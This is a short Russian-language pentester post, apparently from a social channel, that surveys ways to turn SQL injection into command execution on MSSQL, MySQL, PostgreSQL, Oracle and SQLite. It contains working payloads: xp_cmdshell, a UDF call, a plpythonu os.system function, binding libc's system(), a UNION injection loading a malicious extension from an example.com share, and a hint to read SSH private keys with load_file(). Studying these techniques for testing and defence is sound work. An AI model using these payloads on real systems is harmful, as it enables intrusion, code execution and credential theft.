SQLi to RCE

На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)

Исполниться можно в контекстах разных баз данных:
1. MSSQL 💻
2. MySQL 😗
3. PostgreSQL 💻
4. Oracle 🤪
5. SQLite 🤝 (не нашел emoji :))

MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры xp_cmdshell. Конечно, должны присутствовать необходимые привилегии, чтобы ее включить, так как по дефолту она выключена. После этого можно выполнять команды:

EXEC xp_cmdshell 'dir c:\';

MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:

SELECT sys_eval('whoami');

PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу plpythonu для исполнения python когда прямо из SQL.

-- create extension
CREATE EXTENSION IF NOT EXISTS plpythonu;

-- define the malicious function
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;

-- execute command
SELECT exec_cmd('whoami');

2 - Загрузка функции напримую из libc например

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('whoami');

3- Команда PROGRAM

ORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)

SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:

UNION SELECT 1,load_extension('\\example.com\mal_extension.so', 'MainFuncCall')

или например с помощью load_file() прочитать закрытые ключи SSH (этот подход можно применять и в других бдшках)


Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)

#SQLi #RCE